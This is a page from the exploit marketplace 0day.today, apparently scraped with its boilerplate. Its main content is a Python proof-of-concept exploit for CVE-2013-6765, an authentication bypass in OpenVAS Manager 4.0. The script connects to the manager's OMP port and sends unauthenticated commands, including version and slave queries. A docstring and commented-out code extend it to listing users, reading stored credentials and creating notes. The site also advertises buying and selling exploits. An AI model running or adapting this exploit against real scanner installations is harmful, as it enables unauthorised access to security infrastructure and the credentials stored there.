0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

OpenVAS Manager 4.0 - Authentication Bypass Vulnerability PoC

Author

EccE

Risk

[

Security Risk High

]

0day-ID

Category

Date add

CVE

Platform

#!/usr/bin/python
 
# Exploit Title: OpenVAS Manager 4.0 Authentication Bypass Vulnerability PoC
# Date: 09/07/2014
# Exploit Author: EccE
# Vendor Homepage: http://www.openvas.org/
# Software Link: http://wald.intevation.org/frs/?group_id=29
# Version: OpenVAS Manager 4.0
# Tested on: Debian GNU/Linux testing (jessie)
# CVE : CVE-2013-6765
 
"""
    Small list of working commands
 
get_agents
get_configs
get_alerts
get_filters
get_lsc_credentials
get_notes
get_nvts
get_targets
get_users
get_schedules
 
 
More commands (~70 commands) can be found directly in the omc.c file. Not all of them are working though.
As designed in OMP protocol, commands must be sent this way : <COMMAND/>
 
"""
 
import socket, ssl
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
# Require a certificate from the server. We used a self-signed certificate
# so here cacerts.pem must be the server certificate itself.
ssl_sock = ssl.wrap_socket(s,
                           ca_certs="/var/lib/openvas/CA/cacert.pem",
                           cert_reqs=ssl.CERT_REQUIRED)
 
# OpenVAS Manager listen by default on localhost tcp/9390
ssl_sock.connect(('localhost', 9390))
 
 
print "#################################################################"
print "# Proof of Concept - OpenVAS Manager 4.0 Authentication Bypass  #"
print "#################################################################"
print "\n"
 
print "--> Retrieving version...(exploiting the bug !)\n"
ssl_sock.write("<get_version/>")
data = ssl_sock.read()
print data
print "\n"
 
 
print "--> Retrieving slaves...\n"
ssl_sock.write("<get_slaves/>")
tasks = ssl_sock.read()
print tasks
print "\n"
 
"""
print "--> Creating note...\n"
ssl_sock.write("<create_note/>")
note = ssl_sock.read()
print note
 
print "--> Retrieving users list...\n"
ssl_sock.write("<get_users/>")
users_list = ssl_sock.read()
print users_list
"""
ssl_sock.close()

#  0day.today [2024-12-29]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

OpenVAS Manager 4.0 - Authentication Bypass Vulnerability PoC

Report Error

Report Error